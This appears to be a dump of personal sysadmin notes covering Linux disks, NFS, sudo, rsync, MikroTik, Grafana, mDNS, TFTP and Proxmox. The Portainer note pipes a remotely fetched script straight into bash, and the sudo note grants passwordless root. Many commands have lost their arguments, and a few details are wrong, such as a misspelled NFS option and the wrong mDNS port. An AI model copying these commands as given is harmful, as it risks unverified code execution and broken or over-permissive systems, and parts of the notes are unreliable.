Disk manipulation 2 | --- 3 | 4 | ## fdisk 5 | A command-line utility to create, delete, and modify disk partitions on a Linux system. 6 | 7 | ### List disks 8 | `sudo fdisk -l` 9 | 10 | ### To list the partitions on a disk: 11 | `fdisk -l ` 12 | 13 | ### Modify partitions to disk 14 | `sudo fdisk ` 15 | 16 | --- 17 | 18 | ## cfdisk 19 | TUI Partition Manager, to create, delete, resize (non-destructively), and manage partitions, , great for MBR/GPT, visually intuitive. 20 | 21 | `sudo cfdisk` 22 | 23 | --- 24 | 25 | ## parted 26 | 27 | Resize, move, and create partitions, GPT and MBR support. 28 | 29 | `sudo parted /dev/sdX` 30 | 31 | --- 32 | 33 | ## mkfs 34 | `mkfs` (make file system) is a command used to create a file system on a partition or disk. 35 | 36 | ### Format partition to `ext4` 37 | `sudo mkfs.ext4 ` 38 | or 39 | `sudo mkfs -t ` 40 | where `filesystem_type` can be `ext4`, `xfs`, etc. 41 | 42 | --- 43 | 44 | ## mount 45 | Is used to attach a file system to a specified mount point. 46 | 47 | ### To temporarily mount a file system: 48 | `sudo mount ` 49 | 50 | ### Permanent mounting (persistent after reboot) 51 | 1. Edit `/etc/fstab`, and append this line: 52 | ``` 53 | defaults 0 0 54 | ``` 55 | 2. Run `mount -a` to mount it. 56 | 57 | 3. Check if it is mounted by running `df -h`. 58 | 59 | Extra options: 60 | - `-f`: Fake skip the mount syscall. 61 | - `-v`: Verbose, print also some messages. 62 | 63 | --- 64 | 65 | ## umount 66 | `umount` is used to unmount a mounted file system. 67 | 68 | To unmount a file system: 69 | `umount ` 70 | 71 | --- 72 | 73 | ## lsblk 74 | List all block devices, providing details about disks and partitions. 75 | 76 | ### Usage 77 | `sudo lsblk` 78 | 79 | --- 80 | 81 | ## partprobe 82 | Inform the kernel of partition table changes. 83 | 84 | ### Usage 85 | `sudo partprobe ` -------------------------------------------------------------------------------- /Linux/storage/nfs.md: -------------------------------------------------------------------------------- 1 | # Network File Storage 2 | 3 | > [!IMPORTANT] 4 | > NFS (v3 and v4) by default doesn't support password authentication like Samba does. 5 | > So you can restrict access by IP/subnet rather than using usernames and passwords. 6 | 7 | ---- 8 | 9 | ## Server 10 | 11 | ### 1. Create parent dir 12 | The Directory in which all shared folders will exist 13 | 14 | ### 2. Create subdirs 15 | These folders should be located in the parent dir, and will be all the sharable folders. 16 | 17 | ### 3. Install software 18 | 19 | **Debian** 20 | ```bash 21 | sudo apt update -y 22 | sudo apt install -y nfs-kernel-server 23 | ``` 24 | 25 | ### 4. Configure nfs server 26 | 27 | Create a backup file (in case it is needed) 28 | ```bash 29 | sudo cp /etc/exports /etc/exports.bak 30 | ``` 31 | 32 | Then edit `/etc/exports/` like this: 33 | ```txt 34 | /(rw,no_subtree_ckeck) 35 | ``` 36 | 37 | E.g. 38 | ``` 39 | /home/user/nfs_shares/files/ 192.168.0.0/255.255.255.0(rw,no_subtree_ckeck) 40 | /home/user/nfs_shares/documents/ 192.168.0.0/255.255.255.0(rw,no_subtree_ckeck) 41 | /home/user/nfs_shares/backups/ 192.168.0.0/255.255.255.0(rw,no_subtree_ckeck) 42 | ``` 43 | 44 | > [!IMPORTANT] 45 | > If you need root access from the client, then include `no_root_squash` in the options list. 46 | 47 | ### 5. Restart nfs server 48 | ```bash 49 | sudo systemctl restart nfs-kernel-server 50 | systemctl status nfs-kernel-server 51 | ``` 52 | 53 | --- 54 | 55 | ## Client 56 | 57 | ### 1. Install software 58 | 59 | **Debian** 60 | ```bash 61 | sudo apt update -y 62 | sudo apt install -y nfs-common 63 | ``` 64 | 65 | ### 2. Verify server connectivity 66 | 67 | ```bash 68 | showmount --exports # This should display all the subdirs that exist in /etc/exports 69 | ``` 70 | 71 | ### 3. Preparation 72 | As with server, create a parent dir and subdirs that will be attached to remote dirs. 73 | 74 | ### 4. Mount remote shares 75 | ```bash 76 | sudo mount : 77 | ``` 78 | Now you should be able to use remote dirs. 79 | 80 | ### 5. Verify mounts 81 | ```bash 82 | df -h 83 | # Or run 84 | mount 85 | ``` 86 | 87 | ### 6. Unmount 88 | ```bash 89 | sudo umount 90 | ``` -------------------------------------------------------------------------------- /Linux/sudo.md: -------------------------------------------------------------------------------- 1 | # Sudo permissions 2 | 3 | ## Give sudo permissions to a user 4 | 5 | ### 1. Add User to the sudo Group (Debian/Ubuntu and derivatives) 6 | ``` 7 | sudo usermod -aG sudo 8 | ``` 9 | 10 | ### 2. Add User to the wheel Group (Red Hat/CentOS/Fedora and derivatives) 11 | ``` 12 | sudo usermod -aG wheel 13 | ``` 14 | 15 | ### 3. Edit the `/etc/sudoers` File 16 | 1. Run `sudo visudo` 17 | 2. Add a line like: ` ALL=(ALL:ALL) ALL` 18 | 19 | ### 4. Create a Custom File in `/etc/sudoers.d/` 20 | 1. Run `sudo visudo -f /etc/sudoers.d/` 21 | 2. Content ` ALL=(ALL) NOPASSWD: ALL` 22 | 3. Run `sudo chmod 0440 /etc/sudoers.d/` (File must have 0440 permissions) 23 | 24 | ### 5. Grant Specific Command Permissions 25 | Instead of full access, you can give access to only certain commands: 26 | ``` 27 | ALL=(ALL) /path/to/command1 /path/to/command2 command3 28 | ``` 29 | 30 | ## Become sudo 31 | 32 | | Command | Behavior | 33 | |-----------------|--------------------------------------------------------| 34 | | `sudo -i` | Simulates a full root login, loads root's profile (like `/root/`). | 35 | | `sudo su` | You become root, but with your user's environment and current directory | 36 | | `sudo su -` | You become root, and also load root’s full environment (like `sudo -i`) | -------------------------------------------------------------------------------- /Linux/useful-commands.md: -------------------------------------------------------------------------------- 1 | # Useful Linux commands 2 | 3 | ## Random file of size N 4 | Create a file, containing random printable characters of specific size 5 | 6 | `FILE_SIZE=$((1024 * 10)) ; tr -cd '[:print:]' < /dev/random | head -c ${FILE_SIZE} > file.txt` 7 | 8 | Where: 9 | * tr: Translates/deletes characters. 10 | * -c: Complements the set, i.e., matches everything except the specified characters. 11 | * -d: Deletes characters not in the set. 12 | * [:print:]: Matches all printable characters, including spaces. 13 | 14 | --- 15 | 16 | ## `rsync` 17 | 18 | ### Copy files 19 | `rsync -ahP / /` 20 | 21 | Where: 22 | * -a: Preserve timestamp (among other options like recursive copy for directories) 23 | * -h: Human Readable 24 | * -P: Combines 25 | * --progress: Display progress during transfer. 26 | * --partial: Useful for large files, even if the transfer is disrupted, it can be restored. 27 | 28 | ### Sync folders 29 | `rsync -ahP --delete / /` 30 | 31 | Where: 32 | * --delete: Will keep both folders identical, so if something exists in the destination that is not present in the source, it will be deleted. 33 | 34 | ### Move files from one dir to another 35 | `rsync -ahP --remove-source-files / /` 36 | 37 | This though will keep empty directories, it will not delete them. 38 | A workarround is to run afterwards: `find ${source_dir} -type d -empty -delete` 39 | 40 | ### Remote transfer 41 | 42 | #### Local -> Server 43 | `rsync -ahPz @:/` 44 | 45 | rsync uses ssh in the background. 46 | 47 | Where: 48 | * -z: Compress before transfer 49 | 50 | #### Server -> Local 51 | `rsync -ahPz -e 'ssh -p 22' @:/ ` 52 | 53 | Where: 54 | * -z: Compress before transfer 55 | * -e: Put ssh arguments on '' similar to a ssh command. 56 | 57 | ## date 58 | Usage: `date +""` 59 | Where FORMAT all %X available options (see `date --help`) 60 | 61 | E.g. 62 | - `date +"%d-%m-%Y %T"`: 21-04-2025 22:21:31 -------------------------------------------------------------------------------- /Markdown/highlights.md: -------------------------------------------------------------------------------- 1 | # Highlight options 2 | 3 | --- 4 | 5 | ## Simple format 6 | > **Note** 7 | > This is a note 8 | 9 | > **Warning** 10 | > This is a warning 11 | 12 | --- 13 | 14 | ## Extended types 15 | > [!NOTE] 16 | > NOTE 17 | 18 | > [!TIP] 19 | > TIP 20 | 21 | > [!IMPORTANT] 22 | > IMPORTANT 23 | 24 | > [!WARNING] 25 | > WARNING 26 | 27 | > [!CAUTION] 28 | > CAUTION 29 | 30 | --- 31 | 32 | ## Nested 33 | > [!Note] This also includes a title 34 | > Note body 35 | > > [!Hint]- Hint title 36 | > > This is hint body 37 | 38 | -------------------------------------------------------------------------------- /Mikrotik/1.Mikrotik-update.md: -------------------------------------------------------------------------------- 1 | # Mikrotik Update 2 | 3 | 1. **[System]:** → `Packages` 4 | 1. `Check For Updates` 5 | 2. `Download & Install` 6 | 7 | 2. **[System]:** → `RouterBOARD` 8 | 1. `Upgrade` 9 | 2. `OK` 10 | 11 | 3. **[System]:** → `Reboot` 12 | 1. `Yes` -------------------------------------------------------------------------------- /Mikrotik/2.Backup.md: -------------------------------------------------------------------------------- 1 | # Backup 2 | 3 | ## 1. CREATE a BU file 4 | **TODO:** change yourpassword: 5 | 6 | ``` 7 | /system backup cloud upload-file action=create-and-upload password={yourpassword} 8 | ``` 9 | 10 | ## 2. CHECK CLOUD BU SLOT: 11 | This returns a secret-key which needs to be stored if we need to download 12 | if from a different device 13 | ```bash 14 | /system backup cloud print 15 | ``` 16 | 17 | ## 3. DOWNLOAD BACKUP (from the same device): 18 | ```bash 19 | /system backup cloud download-file action=download number=0 20 | ``` 21 | 22 | ## 4. DOWNLOAD BACKUP (from another device): 23 | ```bash 24 | /system backup cloud download-file action=download secret-download-key={exported-key} 25 | ``` 26 | 27 | ## 5. REMOVE BU FILE FROM MIKROTIK SERVERS: 28 | ```bash 29 | /system backup cloud remove-file number=0 30 | ``` -------------------------------------------------------------------------------- /Mikrotik/Firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | ## Port Forwarding 4 | ### WAN --> LAN port forward 5 | ``` 6 | /ip firewall nat add chain=dstnat in-interface= protocol=tcp dst-port= action=dst-nat to-addresses= to-ports= 7 | /ip firewall filter add chain=forward protocol=tcp dst-port= dst-address= action=accept 8 | ``` 9 | 10 | ## Block traffic 11 | 12 | ### Between 2 devices 13 | > [!IMPORTANT] 14 | > **NOT TESTED YET** 15 | 16 | Assume that you have: 17 | - Device A: having IP-A 18 | - Device B: having IP-B 19 | 20 | And you want to communicate between these two devices only on port 22 and drop any other connection on other ports 21 | 22 | ```mermaid 23 | graph LR 24 | 25 | devA["Device A 26 | IP A"] 27 | 28 | 29 | devB["Device B 30 | IP B"] 31 | 32 | devA <-- port 22 --> devB 33 | ``` 34 | 35 | Commands 36 | ``` 37 | # A --> B 38 | /ip firewall filter add chain=forward src-address= dst-address= protocol=tcp dst-port=22 action=accept comment="Allow SSH from A to B" 39 | /ip firewall filter add chain=forward src-address= dst-address= protocol=tcp dst-port=!22 action=drop comment="Block all except port 22 from A to B" 40 | 41 | # B --> A 42 | /ip firewall filter add chain=forward src-address= dst-address= protocol=tcp dst-port=22 action=accept comment="Allow SSH from B to A" 43 | /ip firewall filter add chain=forward src-address= dst-address= protocol=tcp dst-port=!22 action=drop comment="Block all except port 22 from B to A" 44 | ``` -------------------------------------------------------------------------------- /Misc/ipmi.md: -------------------------------------------------------------------------------- 1 | # IPMI 2 | 3 | [Intelligent Platform Management Interface](https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface) is a standard for remote server management, mainly used in data centers and enterprise environments. 4 | 5 | IPMI lets you manage a server remotely even when it's 6 | - Powered off 7 | - Crashed, 8 | - Or has no OS installed. 9 | 10 | It works below the OS level, giving you out-of-band management capabilities. 11 | 12 | ## How It Works 13 | 14 | It runs on a separate microcontroller called the **BMC (Baseboard Management Controller)**. 15 | 16 | The BMC operates independently of the main CPU/OS and usually has its own 17 | Network port (or shares one with the server). 18 | 19 | ## Accessing IPMI 20 | 21 | You can use: 22 | - Web Interface (most BMCs have a web UI) 23 | - CLI tools like [ipmitool](https://github.com/ipmitool/ipmitool) 24 | - Redfish (a newer alternative to IPMI) 25 | 26 | E.g. 27 | ``` 28 | ipmitool -I lanplus -H -U -P power status 29 | ``` 30 | 31 | ## Examples of IPMI 32 | 33 | - [Dell iDRAC](https://www.dell.com/en-us/lp/dt/open-manage-idrac) 34 | - [Supermicro IPMI](https://www.supermicro.com/en/solutions/management-software/bmc-resources) 35 | - [Lenovo IMM](https://lenovopress.lenovo.com/tips0849-imm2-support-on-lenovo-servers) 36 | - [ASRock Rack IPMI](https://www.asrockrack.com/support/IPMI.pdf) 37 | 38 | -------------------------------------------------------------------------------- /Misc/mdm.md: -------------------------------------------------------------------------------- 1 | # Mobile device management 2 | 3 | Mobile Device Management (MDM) is a system or software solution that helps organizations securely manage, monitor, and control mobile devices like smartphones, tablets, and laptops used by employees. 4 | 5 | Key features of MDM: 6 | - Remote device configuration (e.g., Wi-Fi, VPN, email) 7 | - Security enforcement (e.g., screen lock, encryption, antivirus) 8 | - App management (install, update, or remove apps) 9 | - Remote wipe (erase data if a device is lost or stolen) 10 | - Device inventory and monitoring (track devices, usage, and compliance) 11 | 12 | Common MDM Solutions: 13 | - Microsoft Intune 14 | - VMware Workspace ONE 15 | - Jamf (for Apple devices) 16 | - IBM MaaS360 17 | - Flyve MDM -------------------------------------------------------------------------------- /Monitoring/Prometheus/examples/hello-world/README.md: -------------------------------------------------------------------------------- 1 | # Hello World 2 | 3 | 1. Download from [here](https://prometheus.io/download/) the prometheus binary, or use a docker container, etc that contains is. 4 | 2. Copy the `prometheus.yml` in your home directory of the target environment 5 | 3. Open the CLI and run prometheus, make sure to pass as an argument the correct configuration `--config.file="prometheus.yml"`. 6 | 4. Inspect `http://localhost:9090` and the prometheus UI should be available 7 | 5. Make sure that the targets are reachable -------------------------------------------------------------------------------- /Monitoring/Prometheus/examples/hello-world/prometheus.yml: -------------------------------------------------------------------------------- 1 | global: 2 | scrape_interval: 15s 3 | evaluation_interval: 15s 4 | 5 | scrape_configs: 6 | - job_name: "prometheus" 7 | static_configs: 8 | - targets: ["localhost:9090"] 9 | 10 | - job_name: "demo" 11 | static_configs: 12 | - targets: 13 | - demo.promlabs.com:10000 14 | - demo.promlabs.com:10001 15 | - demo.promlabs.com:10002 -------------------------------------------------------------------------------- /Monitoring/grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 3 | Grafana is a powerful open-source platform for monitoring and observability. 4 | 5 | It allows you to visualize and analyze metrics from various data sources like Prometheus, InfluxDB, MySQL, PostgreSQL, and more. 6 | 7 | Grafana queries metrics from Prometheus (or other databases) using a query language like **PromQL**. 8 | 9 | --- 10 | 11 | ## Model 12 | ```mermaid 13 | %%{init: {'theme':'neutral'}}%% 14 | graph LR 15 | 16 | Grafana --> |Prom QL| prom["Prometheus Server"] 17 | ``` 18 | 19 | ## Connection 20 | **Default URL**: `http://:3000` 21 | **Default Credentials** 22 | Username: **admin** 23 | Password: **admin** 24 | 25 | --- 26 | 27 | ## > Prometheus 28 | 29 | In order to connect a Prometheus server to Grafana: 30 | 31 | 1. `Home` > `Connections` > `Data sources` > `Add data source` > `Prometheus` 32 | 1. Set a unique name for the data source 33 | 2. Set Prometheus server URL (e.g., `http://localhost:9090`) 34 | 3. Click Save & Test to verify the connection 35 | 36 | ## > Dashboards 37 | Dashboards in Grafana are composed of panels, each representing a visual element such as a graph, gauge, or stat. 38 | 39 | ### Panel Editor Structure 40 | The panel editor is divided into three key sections: 41 | 42 | 1. Visualization (top): Displays resulting graph or visualization **[V]** 43 | 2. Data queries (bottom): To build and test queries **[D]** 44 | 3. Panel Options (left): Settings for the panel title, description, units, and other visual options **[P]** 45 | 46 | ### Create a new Panel (Vizualization) 47 | 1. Select the vizualization type (e.g. time series) **[P]** 48 | 2. Set time to display **[V]** 49 | 3. Set `Data source` **[D]** 50 | 4. Create queries **[D]** 51 | 5. `Run queries` **[D]** and visualize them **[V]** 52 | 6. Modify them as needed **[D]** 53 | 7. Give a `Title` to the panel **[P]** 54 | 8. Search and set `Unit` **[P]** to help Grafana display better the graphs 55 | 9. When ready, click `Save dashboard` 56 | 57 | ### Ready to use Dashboards 58 | 59 | Instead of creating from scratch a dashboard, there is a list of ready to use dashboards, which is available [here](https://grafana.com/grafana/dashboards/) 60 | 61 | **How to leverage them?** 62 | 1. Find the Dashboard `ID`. 63 | 2. `Home` >`Dashboards` > `Import dashboard` 64 | 3. Paste the Dashboard `ID` 65 | 4. Click `Load` 66 | 5. Choose `Data source` 67 | 6. `Import` 68 | 69 | --- 70 | -------------------------------------------------------------------------------- /Networks/CCNA/cisco-packet-tracer.md: -------------------------------------------------------------------------------- 1 | # Cisco Packet Tracer 2 | 3 | ## Options 4 | 5 | ### Simulation 6 | 7 | 1. `Options` > `Preferences` > `Miscellaneous` 8 | 1. Check [x] `Buffer Filtered Events Only` 9 | 2. `Simulation - Buffer Full Action`: `Auto Clear Event List` 10 | 11 | ### Labels 12 | 1. `Options` > `Preferences` > `Interface` 13 | 1. `Show Device Model Labels` -------------------------------------------------------------------------------- /Networks/CCNA/sfp.md: -------------------------------------------------------------------------------- 1 | # SFP (Small Form-factor Pluggable) 2 | 3 | Small Form-factor Pluggable is a compact, hot-pluggable network interface module used in telecommunication and data communication applications. 4 | 5 | Can be used for either copper or fiber connections. -------------------------------------------------------------------------------- /Networks/dhcpcd.md: -------------------------------------------------------------------------------- 1 | # DHCPCD - (DHCP client) 2 | 3 | ### Reassign DHCP IP address 4 | ```bash 5 | # 0. Find the interface that you want to use 6 | ip link show 7 | 8 | # 1. Kill all dhcpcd processes and release IP 9 | sudo dhcpcd -k 10 | 11 | # 2. Flush existing IP addresses on the interface 12 | sudo ip addr flush dev 13 | 14 | # 3. Start dhcpcd fresh 15 | sudo dhcpcd 16 | ``` -------------------------------------------------------------------------------- /Networks/dmz.md: -------------------------------------------------------------------------------- 1 | # DMZ 2 | 3 | A DMZ, or Demilitarized Zone, in networking is a separate subnetwork that sits between your trusted internal network and an untrusted external network (like the internet). It’s designed to expose external-facing services—such as web, email, or FTP servers—to the outside world while keeping your internal network protected. By isolating these services, even if an attacker compromises a server in the DMZ, your core internal network remains shielded from direct exposure. -------------------------------------------------------------------------------- /Networks/high-availability.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## 2 Tier Architecture - With redundancy 4 | ```mermaid 5 | %%{ init: {'theme':'neutral', 'flowchart': { 'curve': 'stepAfter' } } }%% 6 | flowchart LR 7 | 8 | subgraph Network[" "] 9 | direction TB 10 | 11 | router1(("Router")) 12 | router2(("Router")) 13 | 14 | subgraph distrubution["Distrubution Layers [Tier 2]"] 15 | direction LR 16 | multilayer_switch1[["Multilayer switch (L3)"]] 17 | multilayer_switch2[["Multilayer switch (L3)"]] 18 | end 19 | 20 | subgraph access["Access Layer [Tier 1]"] 21 | direction LR 22 | switch1[["Switch1"]] 23 | switch2[["Switch2"]] 24 | switch3[["Switch3"]] 25 | end 26 | 27 | router1 <--> multilayer_switch1 28 | router1 <--> multilayer_switch2 29 | 30 | router2 <--> multilayer_switch1 31 | router2 <--> multilayer_switch2 32 | 33 | multilayer_switch1 <--> switch1 34 | multilayer_switch1 <--> switch2 35 | multilayer_switch1 <--> switch3 36 | 37 | multilayer_switch2 <--> switch1 38 | multilayer_switch2 <--> switch2 39 | multilayer_switch2 <--> switch3 40 | end 41 | ``` 42 | 43 | \* The distribution layer is also referred to as the aggregation layer 44 | -------------------------------------------------------------------------------- /Networks/ip.md: -------------------------------------------------------------------------------- 1 | # IP Address 2 | 3 | ## Private IP ranges (defined in RFC 1918) 4 | ### Class A 5 | 10.0.0.0 - 10.255.255.255 6 | CIDR Notation: /8 7 | Netmask: 255.0.0.0 8 | Number of Addresses: 16,777,216 9 | Use Case: Large networks. 10 | 11 | ### Class B 12 | 172.16.0.0 - 172.31.255.255 13 | CIDR Notation: /12 14 | Netmask: 255.240.0.0 15 | Number of Addresses: 1,048,576 16 | Use Case: Medium-sized networks 17 | 18 | ### Class C 19 | 192.168.0.0 - 192.168.255.255 20 | CIDR Notation: /16 21 | Netmask: 255.255.0.0 22 | Number of Addresses: 65,536 23 | Use Case: Small networks. -------------------------------------------------------------------------------- /Networks/mDNS.md: -------------------------------------------------------------------------------- 1 | # Multicast DNS 2 | 3 | --- 4 | 5 | ## Approach 1: Avahi (Most Common & Cross-Distro) 6 | 7 | ### A. Installation: 8 | 9 | #### 1.Debian/Ubuntu: 10 | ```bash 11 | sudo apt update 12 | sudo apt install -y avahi-daemon avahi-utils 13 | ``` 14 | 15 | #### 2. RHEL/Fedora/CentOS: 16 | ```bash 17 | sudo dnf install -y avahi avahi-tools 18 | ``` 19 | 20 | ### B. Configuration: 21 | 22 | #### 1. Enable and start the service: 23 | ```bash 24 | sudo systemctl enable avahi-daemon 25 | sudo systemctl start avahi-daemon 26 | ``` 27 | 28 | #### 2. Edit `/etc/avahi/avahi-daemon.conf` if customization is needed. Example (optional): 29 | ```bash 30 | [server] 31 | use-ipv4=yes 32 | use-ipv6=no 33 | ``` 34 | 35 | To advertise services, use .service files in `/etc/avahi/services/`. 36 | 37 | ### C. Verification: 38 | ```bash 39 | # Ping 40 | ping hostname.local 41 | 42 | # Or 43 | avahi-browse -a 44 | ``` 45 | 46 | --- 47 | 48 | ## Approach 2: systemd-resolved (Modern, Native to systemd) 49 | 50 | > [!IMPORTANT] 51 | > This approach should be modified in order to include the latest 52 | > changes of systemd, because systemd-resolve has 53 | > been renamed to resolvectl, however, resolvectl does not support 54 | > --set-mdns=yes 55 | 56 | Supported on: Debian 9+, Ubuntu 16.10+, Fedora 33+, RHEL 8+ 57 | 58 | ### A. Installation: 59 | Usually preinstalled with systemd. 60 | 61 | ### B. Enable mDNS in systemd-resolved: 62 | 63 | 1. Edit or create `/etc/systemd/resolved.conf`: 64 | 65 | ```bash 66 | [Resolve] 67 | MulticastDNS=yes 68 | ``` 69 | 2. Make sure `/etc/nsswitch.conf` includes mdns: 70 | ``` 71 | hosts: files mdns4_minimal [NOTFOUND=return] dns 72 | ``` 73 | 74 | 3. Enable on a link: `sudo systemd-resolve --set-mdns=yes --interface=` 75 | 76 | 3. Then run `sudo systemctl restart systemd-resolved` 77 | 78 | 4. Based on your firewall, make sure to open UDP and TCP ports `5355`. 79 | 80 | ### C. Verification: 81 | 82 | On the host 83 | ``` 84 | sudo systemd-resolve --status 85 | ``` 86 | 87 | On the client: 88 | ``` 89 | ping hostname.local 90 | ``` 91 | 92 | No extra daemons or tools are required if you only want basic mDNS resolution. -------------------------------------------------------------------------------- /Networks/openwrt/README.md: -------------------------------------------------------------------------------- 1 | # OpenWrt 2 | 3 | ## 🔗 List of compatible devices 4 | Find the [list](https://openwrt.org/toh/start) of compatible devices. 5 | 6 | ## 📙 Defaults 7 | ### A. Credentials 8 | Username: `root` 9 | Password: `root` 10 | 11 | ### B. Gateway IP 12 | `192.168.1.1` 13 | 14 | --- 15 | 16 | ## 🚩 Common Issues 17 | 18 | ### 1. SSH connection error 19 | If this error is appeared during ssh connection: 20 | ```bash 21 | Unable to negotiate with 192.168.0.1 port 22: no matching host key type found. Their offer: ssh-rsa 22 | ``` 23 | 24 | This error occurs because recent OpenSSH clients have disabled the older ssh-rsa algorithm (which uses SHA-1) by default for security reasons. 25 | 26 | As a workaround, temporarily accept the ssh-rsa algorithm for this connection: 27 | 28 | ```bash 29 | ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa root@192.168.0.1 30 | ``` 31 | 32 | If you want to frequently connect to this device, include these lines in your `~/.ssh/config` file. 33 | 34 | ```bash 35 | Host 192.168.0.1 36 | HostKeyAlgorithms +ssh-rsa 37 | PubkeyAcceptedAlgorithms +ssh-rsa 38 | ``` -------------------------------------------------------------------------------- /Networks/packet-capture.md: -------------------------------------------------------------------------------- 1 | # Packet Capture 2 | 3 | ## Tools 4 | ### Capture packets via: 5 | 1. Wireshark 6 | 2. tcpdump (Linux/Mac) 7 | 3. netsh (Windows) 8 | 4. tshark (Linux/Mac) 9 | 10 | ### Analysis tools 11 | 1. Teleseer 12 | 13 | ## Wireshark 14 | Remember to enable [x] `Enable promiscuous mode on all interfaces` 15 | 16 | ## Methods to capture packets 17 | ### 1. Use software from a device connected to the network 18 | 19 | ### 2. Use a SPAN port 20 | A SPAN port is a managed switch port that mirrors all the traffic from all other interfaces. 21 | 22 | Characteristics: 23 | 1. Capture packets from all devices connected to the switch 24 | 2. We need to have physical access 25 | 3. We need a managed switch 26 | 4. For high throuput/bandwidth we need a switch that can handle processing and will not drop packets 27 | 28 | ### 3. Using a network TAP (Test Access Point) 29 | A network device that creates a copy of every packet transmitted. It is connected between the router and the switch 30 | 31 | ```mermaid 32 | graph LR 33 | 34 | router --> TAP --> Switch --> Devices 35 | ``` -------------------------------------------------------------------------------- /Networks/protocols/tftp.md: -------------------------------------------------------------------------------- 1 | # Trivial File Transfer Protocol (TFTP) 2 | 3 | > [!NOTE] 4 | > **tftp** protocol typicaly operates on Port: **69** and uses **UDP** 5 | 6 | ## 1. Install both server and client 7 | ```bash 8 | sudo apt update 9 | sudo apt install tftpd-hpa tftp-hpa 10 | ``` 11 | 12 | ## 2. Configure tftp server (daemon) 13 | ```bash 14 | sudo nano /etc/default/tftpd-hpa 15 | ``` 16 | 17 | It should contain something like: 18 | ```bash 19 | TFTP_USERNAME="tftp" 20 | TFTP_DIRECTORY="/srv/tftp" 21 | TFTP_ADDRESS="192.168.0.66:69" 22 | TFTP_OPTIONS="--secure --verbose" 23 | ``` 24 | Where: 25 | - **TFTP_USERNAME**: The user under which the service runs. 26 | - **TFTP_DIRECTORY**: The directory that will serve as the root for TFTP transfers (make sure this directory exists). 27 | - **TFTP_ADDRESS**: The IP and port (UDP port 69 is standard for TFTP). 28 | - **TFTP_OPTIONS**: The --secure option restricts file access to the TFTP_DIRECTORY. 29 | 30 | *If the directory **TFTP_DIRECTORY** doesn’t exist, create it:* 31 | ```bash 32 | sudo mkdir -p /srv/tftp 33 | sudo chown -R tftp:tftp /srv/tftp 34 | ``` 35 | 36 | ## 3. Ensure Operation 37 | ```bash 38 | # Restart the TFTP service 39 | sudo systemctl restart tftpd-hpa 40 | 41 | # Check the status of the TFTP service 42 | sudo systemctl status tftpd-hpa 43 | 44 | # Confirm that it's listening on the correct IP 45 | sudo netstat -ulnp | grep tftp 46 | ``` 47 | 48 | ## 4. Firewall 49 | Make sure that for firewall allows connections 50 | ### 4a. Ubuntu based 51 | ```bash 52 | sudo ufw allow 69/udp 53 | ``` 54 | 55 | ## 5. Verification 56 | In order to evaluate that both the server and client work. 57 | 58 | 1. Add files in the **TFTP_DIRECTORY** dir. 59 | 2. Run `tftp 192.168.0.66` 60 | 3. Execute: 61 | ```bash 62 | verbose on 63 | mode binary 64 | status 65 | get 66 | ``` 67 | 4. Make sure that you can receive the file 68 | 69 | ## 6. Server logs 70 | To view server logs run: 71 | 72 | ### Using syslog 73 | ```bash 74 | sudo tail -f /var/log/syslog | grep tftpd 75 | ``` 76 | 77 | ### Using journalctl (if tftpd-hpa is managed by systemd) 78 | ```bash 79 | sudo journalctl -u tftpd-hpa -f 80 | ``` -------------------------------------------------------------------------------- /Networks/static-ip.md: -------------------------------------------------------------------------------- 1 | # Static IP 2 | One of the ways to set static IP is using `network-manager`. Hence, from a Debian-based machine follow these steps: 3 | 4 | 1. You need netplan support. 5 | 6 | 2. Install network manager 7 | `sudo apt install network-manager` 8 | 9 | 4. Run `ip link show` to find the desired interface. 10 | 11 | 5. Inside this file store the contents provided below 12 | `sudo nano /etc/netplan/01-anyname.yaml` 13 | ``` 14 | network: 15 | version: 2 16 | renderer: NetworkManager 17 | ethernets: 18 | : 19 | dhcp4: no 20 | addresses: [/24] 21 | routes: 22 | - to: default 23 | via: 24 | nameservers: 25 | addresses: [8.8.8.8,8.8.4.4] 26 | ``` 27 | 6. Then run: 28 | `sudo netplan try` 29 | 30 | 7. To disable another link run: 31 | `sudo ip link set [Interface name] down` -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/README.md: -------------------------------------------------------------------------------- 1 | # Nginx Proxy Manager 2 | 3 | 1. Setup SSL 4 | Add both root domain and subdomains 5 | ![NGX SSL](./doc/npm-ssl.png) 6 | 7 | 2. Add proxies 8 | ![NGX Proxy](./doc/npm-proxy.png) 9 | -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/doc/npm-proxy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/Nginx-Proxy-Manager/doc/npm-proxy.png -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/doc/npm-ssl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/Nginx-Proxy-Manager/doc/npm-ssl.png -------------------------------------------------------------------------------- /Proxmox/Portainer.md: -------------------------------------------------------------------------------- 1 | # Portainer 2 | 3 | ## Installation 4 | See: 5 | https://community-scripts.github.io/ProxmoxVE/scripts?id=docker 6 | https://www.youtube.com/watch?v=S8WCtqTMeO8 7 | 8 | 1. Open Proxmox Shell and run: 9 | ``` 10 | bash -c "$(wget -qLO - https://github.com/community-scripts/ProxmoxVE/raw/main/ct/docker.sh)" 11 | ``` 12 | ## Settings: 13 | * a. Use advanced settings 14 | * b. Distribution: ubuntu 15 | * c. Ubuntu version: 22.04 Jammy 16 | * d. Container type: Unprivileged 17 | * e. Hostname: portainer 18 | 19 | 2. Open Portainer shell and run 20 | ``` 21 | bash -c "$(wget -qLO - https://github.com/community-scripts/ProxmoxVE/raw/main/ct/docker.sh)" 22 | ``` 23 | 24 | ### Reboot Portainer twice a day 25 | 26 | 1. Create a new cron job: `crontab -e` 27 | 2. `0 0,12 * * * pct stop [VMID] && pct start [VMID]`, Where VMID is the ID of your LXC container -------------------------------------------------------------------------------- /Proxmox/README.md: -------------------------------------------------------------------------------- 1 | # Proxmox VE (PVE) 2 | 3 | A powerful open-source hypervisor for managing Virtual Machines (VMs) and Linux Containers LXD (CTs). 4 | 5 | **Support:** 6 | - [Proxmox Wiki](https://pve.proxmox.com/wiki) 7 | - [Proxmox Community Forum](https://forum.proxmox.com) 8 | 